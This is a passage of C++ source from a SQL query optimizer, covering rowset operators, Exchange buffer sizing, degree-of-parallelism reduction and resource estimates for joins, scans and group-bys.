                                   rwrsBuffer_, partnNum_, oHeap);
  else
    result = (RowsetFor *) derivedNode;

  // These attributes are not constructor arguments, so copy them
  // explicitly for both branches.
  result->rowwiseRowset_ = rowwiseRowset_;
  result->setBufferAttributes(packedFormat_, compressed_, dcompressInMaster_,
                              compressInMaster_, partnNumInBuffer_);

  return RelExpr::copyTopNode(result,oHeap);
}

Int32 RowsetFor::getArity() const
{
  return 1;
} // RowsetFor::getArity()

// Build the display/EXPLAIN text:
// "RowSetFor INPUT SIZE ..., OUTPUT SIZE ..., KEY BY col".
const NAString RowsetFor::getText() const
{
  NAString result("RowSetFor ", CmpCommon::statementHeap());

  if (inputSizeExpr_) {
    if (inputSizeExpr_->getOperatorType() == ITM_CONSTANT) {
      char str[TEXT_DISPLAY_LENGTH];
      sprintf(str, PF64,
              ((ConstValue *)inputSizeExpr_)->getExactNumericValue());
      result += "INPUT SIZE ";
      result += str;
    }
    else if (inputSizeExpr_->getOperatorType() == ITM_HOSTVAR)
      result += "INPUT SIZE " + ((HostVar *)inputSizeExpr_)->getName();
    else
      result += "INPUT SIZE ??";
    if (outputSizeExpr_ || indexExpr_)
      result += ",";
  }

  if (outputSizeExpr_) {
    if (outputSizeExpr_->getOperatorType() == ITM_CONSTANT) {
      char str[TEXT_DISPLAY_LENGTH];
      sprintf(str, PF64,
              ((ConstValue *)outputSizeExpr_)->getExactNumericValue());
      result += "OUTPUT SIZE ";
      result += str;
    }
    else if (outputSizeExpr_->getOperatorType() == ITM_HOSTVAR)
      result += "OUTPUT SIZE " + ((HostVar *)outputSizeExpr_)->getName();
    else
      result += "OUTPUT SIZE ??";
    if (indexExpr_)
      result += ",";
  }

  if (indexExpr_)
    result += ("KEY BY " +
               ((ColReference *)indexExpr_)->getColRefNameObj().getColName());

  return result;
}

// -----------------------------------------------------------------------
// methods for class RowsetInto
// -----------------------------------------------------------------------

// Constructor
RowsetInto::RowsetInto(RelExpr *child, ItemExpr *outputHostvars,
                       ItemExpr *sizeExpr, CollHeap* oHeap) :
  RelExpr(REL_ROWSET_INTO,child,NULL,oHeap),
  outputHostvars_(outputHostvars),
  sizeExpr_(sizeExpr),
  requiredOrderTree_(NULL)
{
  setNonCacheable();
  requiredOrder_.clear();
} // RowsetInto::RowsetInto()

// Destructor.
RowsetInto::~RowsetInto()
{
} // RowsetInto::~RowsetInto()

RelExpr * RowsetInto::copyTopNode(RelExpr *derivedNode, CollHeap* oHeap)
{
  RowsetInto *result;

  if (derivedNode == NULL)
    result = new (oHeap) RowsetInto(NULL, outputHostvars_, sizeExpr_, oHeap);
  else
    result = (RowsetInto *) derivedNode;

  return RelExpr::copyTopNode(result,oHeap);
} // RowsetInto::copyTopNode()

Int32 RowsetInto::getArity() const
{
  return 1; // This select-list root node
} // RowsetInto::getArity()

// Build the display/EXPLAIN text: "RowsetINTO <size> (hv1, hv2, ...)".
const NAString RowsetInto::getText() const
{
  NAString result("RowsetINTO",CmpCommon::statementHeap());

  if (sizeExpr_) {
    if (sizeExpr_->getOperatorType() == ITM_CONSTANT) {
      char str[TEXT_DISPLAY_LENGTH];
      sprintf(str, " " PF64 ,
              ((ConstValue *)sizeExpr_)->getExactNumericValue());
      result += str;
    }
    else if (sizeExpr_->getOperatorType() == ITM_HOSTVAR)
      result += " " + ((HostVar *)sizeExpr_)->getName();
    else
      result += " ??";
  }

  result += " (";
  // Walk the right-linked list of output host variables.
  for (ItemExpr *hostVarTree = outputHostvars_;
       hostVarTree != NULL;
       hostVarTree = hostVarTree->child(1)) {
    if (outputHostvars_ != hostVarTree)
      result += ", ";
    HostVar *hostVar = (HostVar *)hostVarTree->getChild(0);
    result += hostVar->getName();
  }
  result += ")";

  return result;
}

// Returns TRUE iff the tree below (and including) this node contains an
// Exchange whose child does not execute in DP2 -- i.e. an ESP exchange.
NABoolean RelExpr::treeContainsEspExchange()
{
  Lng32 nc = getArity();
  if (nc > 0)
  {
    if ((getOperatorType() == REL_EXCHANGE) &&
        (child(0)->castToRelExpr()->getPhysicalProperty()->getPlanExecutionLocation() !=
         EXECUTE_IN_DP2))
    {
      return TRUE;
    }

    for (Lng32 i = 0; i < nc; i++)
    {
      if (child(i)->treeContainsEspExchange())
        return TRUE;
    }
  }
  return FALSE;
}

// TRUE iff the probe key is fully contained in this exchange's
// characteristic inputs.
// NOTE(review): pkey is passed by value; const& would avoid a copy.
NABoolean Exchange::areProbesHashed(const ValueIdSet pkey)
{
  return getGroupAttr()->getCharacteristicInputs().contains(pkey);
}

// Estimate the up- and down-message buffer lengths (returned in KB via
// the two reference parameters, and also cached in the corresponding
// data members) for this exchange, given the number of consumers and
// producers.
void Exchange::computeBufferLength(const Context *myContext,
                                   const CostScalar &numConsumers,
                                   const CostScalar &numProducers,
                                   CostScalar &upMessageBufferLength,
                                   CostScalar &downMessageBufferLength)
{
  CostScalar numDownBuffers = (Int32) ActiveSchemaDB()->getDefaults().getAsULong
    (GEN_SNDT_NUM_BUFFERS);
  CostScalar numUpBuffers = (Int32) ActiveSchemaDB()->getDefaults().getAsULong
    (GEN_SNDB_NUM_BUFFERS);
  CostScalar maxOutDegree = MAXOF(numConsumers, numProducers);

  CostScalar upSizeOverride = ActiveSchemaDB()->getDefaults().getAsLong
    (GEN_SNDT_BUFFER_SIZE_UP);

  // The adjustment is a fudge factor to improve scalability by reducing
  // the buffer size "penalty" when the number of connections is high due
  // to a high degree of parallelism.  The net result is to increase the
  // memory "floor" and "ceiling" (that are based on the number of
  // connections) by up to fourfold.  Too high a ceiling can cause memory
  // pressure, a high level of paging activity, etc., while too low a
  // ceiling can cause a large number of IPC messages and dispatches, and
  // a resultant increase in path length.  The adjustment attempts to
  // strike a balance between the two opposing clusters of performance
  // factors.
  CostScalar adjMaxNumConnections =
    maxOutDegree < 32 || upSizeOverride == 1 || upSizeOverride > 2 ?
      maxOutDegree :
    maxOutDegree < 64 ? 32 :
    maxOutDegree < 128 ? 40 :
    maxOutDegree < 256 ? 50 :
    maxOutDegree < 512 ? 64 : 70;

  CostScalar overhead = CostScalar(50);

  // compute numProbes, probeSize, cardinality, outputSize
  CostScalar downRecordLength = getGroupAttr()->
    getCharacteristicInputs().getRowLength();
  CostScalar upRecordLength = getGroupAttr()->
    getCharacteristicOutputs().getRowLength();
  const CostScalar & numOfProbes =
    ( myContext->getInputLogProp()->getResultCardinality() ).minCsOne();

  // use no more than 50 KB and try to send all rows down in a single message
  CostScalar reasonableBufferSpace1 =
    CostScalar(50000) / (maxOutDegree * numDownBuffers);
  reasonableBufferSpace1 =
    MINOF(reasonableBufferSpace1, (downRecordLength + overhead) * numOfProbes);

  const EstLogPropSharedPtr inputLP = myContext->getInputLogProp();
  CostScalar numRowsUp = child(0).outputLogProp(inputLP)->
    getResultCardinality();

  // A broadcast replication sends every row to every consumer.
  const PartitioningFunction* const parentPartFunc =
    myContext->getPlan()->getPhysicalProperty()->getPartitioningFunction();
  if (parentPartFunc->isAReplicateViaBroadcastPartitioningFunction())
    numRowsUp = numRowsUp * numConsumers;

  // check for an overriding define for the buffer size
  CostScalar downSizeOverride = ActiveSchemaDB()->getDefaults().getAsLong
    (GEN_SNDT_BUFFER_SIZE_DOWN);

  if (downSizeOverride.isGreaterThanZero())
    reasonableBufferSpace1 = downSizeOverride;

  // we MUST be able to fit at least one row into a buffer
  CostScalar controlAppendedLength = ComTdbSendTop::minSendBufferSize(
    (Lng32)downRecordLength.getValue());
  downMessageBufferLength =
    MAXOF(controlAppendedLength, reasonableBufferSpace1);

  // Total size of output buffer that needs to be sent to the parent.
  CostScalar totalBufferSize = upRecordLength * numRowsUp;

  // Divide this by number of connections to get total buffer per connection.
  CostScalar bufferSizePerConnection = totalBufferSize / adjMaxNumConnections;

  // Aim for a situation where at least 80 messages are sent per connection.
  CostScalar reasonableBufferSpace2 =
    bufferSizePerConnection / ActiveSchemaDB()
      ->getDefaults().getAsLong(GEN_EXCHANGE_MSG_COUNT);

  // Now Esp has numUpBuffers of size reasonableBufferSpace2 per
  // each stream (connection), so total memory to be allocated
  // in this Esp would be:
  // reasonableBufferSpace2 * numUpBuffers * maxOutDegree.
  // We need to apply ceiling and floor to this memory i.e.:
  // 4MB > reasonableBufferSpace2 * numUpBuffers * maxOutDegree > 50KB.
  // OR divide both ceiling and floor by numUpBuffers * maxOutDegree.
  Int32 maxMemKB = ActiveSchemaDB()
    ->getDefaults().getAsLong(GEN_EXCHANGE_MAX_MEM_IN_KB);
  if (maxMemKB <= 0)
    maxMemKB = 4000; // 4MB if not set or negative
  CostScalar maxMem1 = maxMemKB * 1000;
  CostScalar maxMem2 = maxMemKB * 4000;
  CostScalar ceiling = MINOF(maxMem1 / (numUpBuffers * adjMaxNumConnections),
                             maxMem2 / (numUpBuffers * maxOutDegree));
  CostScalar floor = MINOF(CostScalar(50000) /
                           (numUpBuffers * adjMaxNumConnections),
                           CostScalar(200000) / (numUpBuffers * maxOutDegree));

  // Apply the floor.
  reasonableBufferSpace2 = MAXOF(floor, reasonableBufferSpace2);
  // Apply the ceiling.
  reasonableBufferSpace2 = MINOF(ceiling, reasonableBufferSpace2);
  // Make sure the floor is at least 5K to avoid performance problem.
  reasonableBufferSpace2 = MAXOF(CostScalar(5000), reasonableBufferSpace2);

  // Make sure that it is at most 31k-1356
  reasonableBufferSpace2 =
    MINOF( reasonableBufferSpace2, 31 * 1024 - 1356);

  if (upSizeOverride.isGreaterThanZero())
    reasonableBufferSpace2 = upSizeOverride;

  // we MUST be able to fit at least one row into a buffer
  controlAppendedLength = ComTdbSendTop::minReceiveBufferSize(
    (Lng32) (upRecordLength.getValue()) );
  upMessageBufferLength = MAXOF( controlAppendedLength,
                                 reasonableBufferSpace2);

  // convert Buffers to kilo bytes
  upMessageBufferLength_= upMessageBufferLength =
    upMessageBufferLength/CostScalar(1024);
  downMessageBufferLength_ = downMessageBufferLength =
    downMessageBufferLength/ CostScalar(1024);
} // Exchange::computeBufferLength()

//////////////////////////////////////////////////////////////////////
// Class pcgEspFragment related methods
//////////////////////////////////////////////////////////////////////

// Append an exchange node to this fragment's list of child ESPs.
void pcgEspFragment::addChild(Exchange* esp)
{
  CollIndex newIndex = childEsps_.entries();
  childEsps_.insertAt(newIndex, esp);
}

// Verify that the newly added exchange node at the end of childEsps_[]
// is compatible with others.
// Note that preCodeGen traversal the query tree via a depth-first
// search. Each time the leave exchange node in this fragment is encountered,
// this method is called, The order of visit to the child exchanges
// is from left to right.
//
NABoolean pcgEspFragment::tryToReduceDoP()
{
  float threshold;
  ActiveSchemaDB()->
    getDefaults().getFloat(DOP_REDUCTION_ROWCOUNT_THRESHOLD, threshold);

  // A threshold of exactly 0.0 disables DoP reduction entirely.
  if ( threshold == 0.0 || getTotaleRows() >= threshold )
  {
    return FALSE;
  }

  // Defensive programming. Nothing to verify when there is no child esp.
  if ( childEsps_.entries() == 0 )
    return FALSE;

  // Get the ptr to last exchange
  CollIndex lastIdx = childEsps_.entries()-1;
  Exchange* xch = childEsps_[lastIdx];

  //
  // No dop reduction for Parallel Extract
  //
  if ( xch->getExtractProducerFlag() || xch->getExtractConsumerFlag() )
    return FALSE;

  PartitioningFunction* partFunc =
    xch->getPhysicalProperty()->getPartitioningFunction();

  //
  // If xch's count of partitions is less than newDoP, bail out
  //
  Lng32 newDoP = CURRSTMT_OPTDEFAULTS->getDefaultDegreeOfParallelism();

  if ( partFunc->getCountOfPartitions() < newDoP )
    return FALSE;

  // Do not reduce dop if this exchange is a PA, except if it is
  // the right child of a TYPE2 join, using replicate-no-broadcast.
  // An extra exchange is needed otherwise to bridge the
  // new DoP and all original partitions, unless the newDoP is a factor
  // of #part of the hash2 partfunc for the PA node.
  //
  if ( xch->child(0)->getPhysicalProperty()
       ->getPlanExecutionLocation() == EXECUTE_IN_DP2)
  {
    if ( partFunc->isAHash2PartitioningFunction() )
    {
      if ( partFunc->getCountOfPartitions() % newDoP != 0 )
        return FALSE;
    }
    else if (!partFunc->isAReplicateNoBroadcastPartitioningFunction())
      return FALSE;
  }

  Lng32 suggestedNewDoP = newDoP;

  //
  // Make a copy of the part func as the scaling method can side effect.
  //
  PartitioningFunction* partFuncCopy =
    xch->getPhysicalProperty()->getPartitioningFunction()->copy();
  // NOTE(review): newPF itself is unused; the call is made for its side
  // effect on suggestedNewDoP.
  PartitioningFunction* newPF =
    partFuncCopy->scaleNumberOfPartitions(suggestedNewDoP);

  //
  // If the part func can not scale to newDoP, bail out.
  //
  if ( suggestedNewDoP != newDoP )
    return FALSE;

  //
  // Find a common dop for all child esps in the fragment first.
  // A common dop is one associated with 1st esp that has non-
  // broadcasting part func. All other child esps with non-broadcasting
  // partFunc should be use the "common dop". This is true prior to
  // the dop reduction attempt. If it is already found (commonDoP_ > 0),
  // just use it.
  //
  if ( commonDoP_ == 0 &&
       partFuncCopy->isAReplicationPartitioningFunction() == FALSE )
    commonDoP_ = partFuncCopy->getCountOfPartitions();

  // If the dop at child exchange A can be reduced but not at
  // child exchange B, we may end up with in an inconsistent state.
  // The following code detects it.
  if ( commonDoP_ > 0 )
  {
    if ( partFuncCopy->isAReplicationPartitioningFunction() == FALSE &&
         partFuncCopy->getCountOfPartitions() != commonDoP_ )
      return FALSE;
  }

  //
  // The new dop is acceptable.
  //
  newDoP_ = newDoP;
  setValid(TRUE);

  return TRUE;
}

// Mark this fragment as not eligible for DoP reduction.
void pcgEspFragment::invalidate()
{
  setValid(FALSE);
  //for ( CollIndex i=0; i<childEsps_.entries(); i++ ) {
  //  childEsps_[i]->getEspFragPCG()->invalidate();
  //}
}

// Propagate DoP adjustment into every child fragment.
void pcgEspFragment::adjustDoP(Lng32 newDop)
{
  for ( CollIndex i=0; i<childEsps_.entries(); i++ ) {
    Exchange* xch = childEsps_[i];

    // Recursively adjust the dop for my child fragments.
    // Each exchange will have its own pcgEspFragment to work with.
    xch->doDopReduction();
  }
}

// Default traversal: recurse into all children looking for Exchanges.
void RelExpr::doDopReduction()
{
  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
  {
    child(i)->doDopReduction();
  }
}

void Exchange::doDopReduction()
{
  //
  // Once this method is called for the top most Exchange, we can
  // recursively call the same method for all the esp fragments via
  // the pointers (to esps) saved in the pcgEsgFragment objects.
  //
  Lng32 newDop = getEspFragPCG()->getNewDop();

  if ( getEspFragPCG()->isValid() )
  {
    // Adjust the partfunc for all nodes within the fragment, starting
    // from my child and down to every bottom-defining exchanges.
    child(0)->doDopReductionWithinFragment(newDop);
  }

  // Next recursively call the same method for all fragments below me.
  getEspFragPCG()->adjustDoP(newDop);
}

// Apply the new DoP to every node from here down to (and including) the
// exchanges that bound this fragment at the bottom.
void RelExpr::doDopReductionWithinFragment(Lng32 newDoP)
{
  adjustTopPartFunc(newDoP);

  if ( getOperatorType() == REL_EXCHANGE )
  {
    //
    // Need to adjust the Logical part of the part func if
    // my child's part func is a LogPhy partfunc.
    //
    if ( child(0)->getPhysicalProperty()->getPlanExecutionLocation()
         == EXECUTE_IN_DP2)
    {
      PartitioningFunction *pf =
        child(0)->getPhysicalProperty()->getPartitioningFunction();

      if ( pf->isALogPhysPartitioningFunction() )
        child(0)->adjustTopPartFunc(newDoP);
    }
    // Stop at a bottom-defining exchange: nodes below belong to another
    // fragment.
    return;
  }

  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
  {
    child(i)->doDopReductionWithinFragment(newDoP);
  }
}

// Rescale this node's partitioning function to the new DoP and remember
// that a reduction took place.
void RelExpr::adjustTopPartFunc(Lng32 newDop)
{
  ((PhysicalProperty*)getPhysicalProperty())->scaleNumberOfPartitions(newDop);
  setDopReduced(TRUE);
}

// Required Resource Estimate Methods - Begin

// Accumulate resource requirements bottom-up: children first, then this
// node's own contribution.
void RelExpr::computeRequiredResources(RequiredResources & reqResources,
                                       EstLogPropSharedPtr & inLP)
{
  Int32 nc = getArity();
  for (Lng32 i = 0; i < nc; i++)
  {
    if (child(i))
      child(i)->computeRequiredResources(reqResources, inLP);
    else
      child(i).getLogExpr()->computeRequiredResources(reqResources, inLP);
  }

  computeMyRequiredResources(reqResources, inLP);
}

// Join override: for a TSJ the right child's input properties are the
// left child's output properties, so the children cannot simply share inLP.
void Join::computeRequiredResources(RequiredResources & reqResources,
                                    EstLogPropSharedPtr & inLP)
{
  Int32 nc = getArity();
  if (child(0))
    child(0)->computeRequiredResources(reqResources, inLP);
  else
    child(0).getLogExpr()->computeRequiredResources(reqResources, inLP);

  EstLogPropSharedPtr inputForRight = inLP;
  EstLogPropSharedPtr leftOutput =
    child(0).getGroupAttr()->outputLogProp(inLP);

  if(isTSJ())
  {
    inputForRight = leftOutput;
  }

  if (child(1))
    child(1)->computeRequiredResources(reqResources, inputForRight);
  else
    child(1).getLogExpr()->computeRequiredResources(reqResources, inputForRight);

  computeMyRequiredResources(reqResources, inLP);
}

// Add one operator's resource estimates to the running totals and track
// the per-operator maxima.
void RequiredResources::accumulate(CostScalar memRsrcs,
                                   CostScalar cpuRsrcs,
                                   CostScalar dataAccessCost,
                                   CostScalar maxCard)
{
  memoryResources_ += memRsrcs;
  cpuResources_ += cpuRsrcs;
  dataAccessCost_ += dataAccessCost;

  if(maxOperMemReq_ < memRsrcs)
    maxOperMemReq_ = memRsrcs;

  if(maxOperCPUReq_ < cpuRsrcs)
    maxOperCPUReq_ = cpuRsrcs;

  if(maxOperDataAccessCost_ < dataAccessCost)
    maxOperDataAccessCost_ = dataAccessCost;
if(maxMaxCardinality_ < maxCard) maxMaxCardinality_ = maxCard; } void RelExpr::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { CostScalar cpuResourcesRequired = csZero; CostScalar A = csOne; CostScalar B (getDefaultAsDouble(WORK_UNIT_ESP_DATA_COPY_COST)); Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { GroupAttributes * childGroupAttr = child(i).getGroupAttr(); CostScalar childCardinality = childGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); cpuResourcesRequired += (A * childCardinality) + (B * childCardinality * childRecordSize ); } CostScalar myMaxCard = getGroupAttr()->getResultMaxCardinalityForInput(inLP); reqResources.accumulate(csZero, cpuResourcesRequired, csZero, myMaxCard); } void RelRoot::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { if (hasOrderBy()) { CostScalar memoryResourcesRequired = csZero; GroupAttributes * childGroupAttr = child(0).getGroupAttr(); CostScalar childCardinality = childGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); memoryResourcesRequired = (childCardinality * childRecordSize); reqResources.accumulate(memoryResourcesRequired, csZero, csZero); } // add the cpu resources RelExpr::computeMyRequiredResources(reqResources, inLP); } void MultiJoin::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { // get the subset analysis for this MultiJoin JBBSubsetAnalysis * subsetAnalysis = getJBBSubset().getJBBSubsetAnalysis(); subsetAnalysis->computeRequiredResources(this,reqResources, inLP); } void Join::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { CostScalar memoryResourcesRequired = csZero; // only get the max card for this join. 
The contribution from the children // of this join is done inside Join::computeReequiredResource() where // child(i)->computeRequiredResources() is called (i=0,1). These two calls // will call ::computeMyRequiredResoruce() of the corresponding RelExpr. // GroupAttributes * myGroupAttr = getGroupAttr(); CostScalar myMaxCard = myGroupAttr->getResultMaxCardinalityForInput(inLP); reqResources.accumulate(csZero, csZero, csZero, myMaxCard); if(!isTSJ()) { GroupAttributes * innerChildGroupAttr = child(1).getGroupAttr(); CostScalar innerChildCardinality = innerChildGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar innerChildRecordSize = innerChildGroupAttr->getCharacteristicOutputs().getRowLength(); memoryResourcesRequired = (innerChildCardinality * innerChildRecordSize); reqResources.accumulate(memoryResourcesRequired, csZero, csZero); // add the cpu resources RelExpr::computeMyRequiredResources(reqResources, inLP); } else{ // isTSJ() == TRUE CostScalar cpuResourcesRequired = csZero; CostScalar A = csOne; CostScalar B (getDefaultAsDouble(WORK_UNIT_ESP_DATA_COPY_COST)); Int32 nc = getArity(); EstLogPropSharedPtr inputForChild = inLP; for (Lng32 i = 0; i < nc; i++) { GroupAttributes * childGroupAttr = child(i).getGroupAttr(); CostScalar childCardinality = childGroupAttr->outputLogProp(inputForChild)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); cpuResourcesRequired += (B * childCardinality * childRecordSize ); // do this only for the left child if(i < 1) cpuResourcesRequired += (A * childCardinality); inputForChild = child(i).getGroupAttr()->outputLogProp(inputForChild); } reqResources.accumulate(csZero, cpuResourcesRequired, csZero); } } void GroupByAgg::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { CostScalar memoryResourcesRequired = csZero; GroupAttributes * childGroupAttr = child(0).getGroupAttr(); CostScalar childCardinality = 
childGroupAttr->outputLogProp(inLP)->getResultCardinality(); CostScalar childRecordSize = childGroupAttr->getCharacteristicOutputs().getRowLength(); memoryResourcesRequired = (childCardinality * childRecordSize); reqResources.accumulate(memoryResourcesRequired, csZero, csZero); // add the cpu resources RelExpr::computeMyRequiredResources(reqResources, inLP); } void Scan::computeMyRequiredResources(RequiredResources & reqResources, EstLogPropSharedPtr & inLP) { if(!(QueryAnalysis::Instance() && QueryAnalysis::Instance()->isAnalysisON())) return; //Get a handle to ASM AppliedStatMan * appStatMan = QueryAnalysis::ASM(); const TableAnalysis * tAnalysis = getTableDesc()->getTableAnalysis(); CANodeId tableId = tAnalysis->getNodeAnalysis()->getId(); // Find index joins and index-only scans addIndexInfo(); // Base table scan is one of the index only scans. CostScalar cpuCostIndexOnlyScan = computeCpuResourceForIndexOnlyScans(tableId); CostScalar cpuCostIndexJoinScan = computeCpuResourceForIndexJoinScans(tableId); CostScalar cpuResourcesRequired = cpuCostIndexOnlyScan; if ( getTableDesc()->getNATable()->isHbaseTable()) { if ( cpuCostIndexJoinScan < cpuResourcesRequired ) cpuResourcesRequired = cpuCostIndexJoinScan; } CostScalar dataAccessCost = tAnalysis->getFactTableNJAccessCost(); if(dataAccessCost < 0) { CostScalar rowsToScan = appStatMan-> getStatsForLocalPredsOnCKPOfJBBC(tableId)-> getResultCardinality(); CostScalar numOfProbes(csZero); // skip this for fact table under nested join dataAccessCost = tAnalysis->computeDataAccessCostForTable(numOfProbes, rowsToScan); } CostScalar myMaxCard = getGroupAttr()->getResultMaxCardinalityForInput(inLP); reqResources.accumulate(csZero, cpuResourcesRequired, dataAccessCost, myMaxCard ); } // Required Resource Estimate Methods - End CostScalar Scan::computeCpuResourceRequired(const CostScalar& rowsToScan, const CostScalar& rowSize) { CostScalar A = csOne; CostScalar B (getDefaultAsDouble(WORK_UNIT_ESP_DATA_COPY_COST)); CostScalar 
cpuResourcesRequired = (B * rowsToScan * rowSize); cpuResourcesRequired += (A * rowsToScan); return cpuResourcesRequired; } CostScalar Scan::computeCpuResourceForIndexOnlyScans(CANodeId tableId) { // If index only scans are available, find the most // promising index and compute the CPU resource for it. const SET(IndexProperty *)& indexOnlyScans = getIndexOnlyIndexes(); IndexProperty* smallestIndex = findSmallestIndex(indexOnlyScans); if ( !smallestIndex ) return COSTSCALAR_MAX; IndexDesc* iDesc = smallestIndex->getIndexDesc(); const ValueIdList &ikeys = iDesc->getIndexKey(); AppliedStatMan * appStatMan = QueryAnalysis::ASM(); EstLogPropSharedPtr estLpropPtr = appStatMan-> getStatsForLocalPredsOnPrefixOfColList(tableId, ikeys); if ( !(estLpropPtr.get()) ) return COSTSCALAR_MAX; return computeCpuResourceRequired(estLpropPtr->getResultCardinality(), iDesc->getRecordLength() ); } CostScalar Scan::computeCpuResourceForIndexJoinScans(CANodeId tableId) { // If index scans are available, find the index with most promising and // compute the CPU resource for it. 
const LIST(ScanIndexInfo *)& scanIndexJoins = getPossibleIndexJoins(); if ( scanIndexJoins.entries() == 0 ) return COSTSCALAR_MAX; IndexProperty* smallestIndex = findSmallestIndex(scanIndexJoins); IndexDesc* iDesc = smallestIndex->getIndexDesc(); CostScalar rowsToScan; return computeCpuResourceForIndexJoin(tableId, iDesc, iDesc->getIndexKey(), rowsToScan); } CostScalar Scan::computeCpuResourceForIndexJoin(CANodeId tableId, IndexDesc* iDesc, ValueIdSet& indexPredicates, CostScalar& rowsToScan) { ValueIdList ikeysCovered; UInt32 sz = iDesc->getIndexKey().entries(); for (CollIndex i=0; i<sz; i++) { ValueId x = iDesc->getIndexKey()[i]; if ( indexPredicates.containsAsEquiLocalPred(x) ) ikeysCovered.insertAt(i, x); else break; } return computeCpuResourceForIndexJoin(tableId, iDesc, ikeysCovered, rowsToScan); } CostScalar Scan::computeCpuResourceForIndexJoin(CANodeId tableId, IndexDesc* iDesc, const ValueIdList& ikeys, CostScalar& rowsToScan) { AppliedStatMan * appStatMan = QueryAnalysis::ASM(); EstLogPropSharedPtr estLpropPtr = appStatMan-> getStatsForLocalPredsOnPrefixOfColList(tableId, ikeys); if ( !(estLpropPtr.get()) ) { rowsToScan = COSTSCALAR_MAX; return COSTSCALAR_MAX; } rowsToScan = estLpropPtr->getResultCardinality(); CostScalar rowSize = iDesc->getRecordLength(); CostScalar cpuResourceForIndex = computeCpuResourceRequired(rowsToScan, rowSize); rowSize = getTableDesc()->getClusteringIndex()->getRecordLength(); CostScalar cpuResourceForBaseTable = computeCpuResourceRequired(rowsToScan, rowSize); return cpuResourceForIndex + cpuResourceForBaseTable; } IndexProperty* Scan::findSmallestIndex(const SET(IndexProperty *)& indexes) const { CollIndex entries = indexes.entries(); if ( entries == 0 ) return NULL; IndexProperty* smallestIndex = indexes[0]; for (CollIndex i=1; i<entries; i++ ) { IndexProperty* current = indexes[i]; if ( smallestIndex->compareIndexPromise(current) == LESS ) { smallestIndex = current; } } return smallestIndex; } IndexProperty* 
Scan::findSmallestIndex(const LIST(ScanIndexInfo *)& possibleIndexJoins) const { CollIndex entries = possibleIndexJoins_.entries(); if ( entries == 0 ) return NULL; IndexProperty* smallestIndex = findSmallestIndex(possibleIndexJoins[0]->usableIndexes_); for (CollIndex i=1; i<entries; i++ ) { IndexProperty* current = findSmallestIndex(possibleIndexJoins[i]->usableIndexes_); if ( smallestIndex->compareIndexPromise(current) == LESS ) { smallestIndex = current; } } return smallestIndex; } // This function checks if the passed RelExpr is a UDF rule created by a CQS // (REL_FORCE_ANY_SCALAR_UDF). If not, then RelExpr::patternMatch() is called. // If the CQS rule includes the UDF name this name is checked against the routine // name of this physical isolated scalar UDF. If the CQS rule includes the action // name, then this is checked against the action name of this physical isolated // scalar UDF as well. The function returns TRUE if so, otherwise FALSE. NABoolean PhysicalIsolatedScalarUDF::patternMatch(const RelExpr & other) const { // Check if CQS is a scalar UDF rule. if (other.getOperatorType() == REL_FORCE_ANY_SCALAR_UDF) { UDFForceWildCard &w = (UDFForceWildCard &) other; // Check function name, if specified in UDFForceWildCard. if (w.getFunctionName() != "") { QualifiedName funcName(w.getFunctionName(), 1 /* minimal 1 part name */); // Compare catalog, schema and udf parts separately, // if they exist in the wildcard const NAString& catName = funcName.getCatalogName(); const NAString& schName = funcName.getSchemaName(); const QualifiedName& x = getRoutineName(); if ((catName.length() > 0 && x.getCatalogName() != catName) || (schName.length() > 0 && x.getSchemaName() != schName) || x.getObjectName() != funcName.getObjectName()) return FALSE; } // Check action name, if specified in UDFForceWildCard. 
if (w.getActionName() != "") { NAString actionName = w.getActionName(); if (getActionNARoutine() && getActionNARoutine()->getActionName()) { // Compare only object parts. Right now actions don't support catalogs and schemas. // This is because action names can have a leading '$' as part of name. const NAString& x = *(getActionNARoutine()->getActionName()); if (x != actionName) return FALSE; } else return FALSE; } return TRUE; } else return RelExpr::patternMatch(other); } const NAString RelExpr::getCascadesTraceInfoStr() { NAString result("RelExpr Cascades Trace Info:\n"); result += " parent taskid: " + istring(getParentTaskId()) + "\n"; result += " sub taskid: " + istring(getSubTaskId()) + "\n"; result += " birth id: " + istring(getBirthId()) + "\n"; result += " memo exprid: " + istring(memoExprId_) + "\n"; result += " source memo exprid: " + istring(sourceMemoExprId_) + "\n"; result += " source groupid: " + istring(sourceGroupId_) + "\n"; char costLimitStr[50]; sprintf(costLimitStr," cost limit %g\n", costLimit_); result += costLimitStr; return result; } // remember the creator and source of this relexpr for cascades display gui void RelExpr::setCascadesTraceInfo(RelExpr *src) { CascadesTask * currentTask = CURRSTMT_OPTDEFAULTS->getCurrentTask(); if (currentTask) { // current task created this relexpr parentTaskId_ = currentTask->getParentTaskId(); stride_ = currentTask->getSubTaskId(); // remember time of my birth birthId_ = CURRSTMT_OPTDEFAULTS->getTaskCount(); // remember my source sourceGroupId_ = currentTask->getGroupId(); if (src) sourceMemoExprId_ = src->memoExprId_; // remember current task's context's CostLimit Context * context = currentTask->getContext(); if(context && context->getCostLimit()) costLimit_ = context->getCostLimit()->getCachedValue(); } // get my MemoExprId and advance it memoExprId_ = CURRSTMT_OPTDEFAULTS->updateGetMemoExprCount(); } NABoolean Join::childNodeContainSkew( CollIndex i, // IN: which child const ValueIdSet& joinPreds, // IN: 
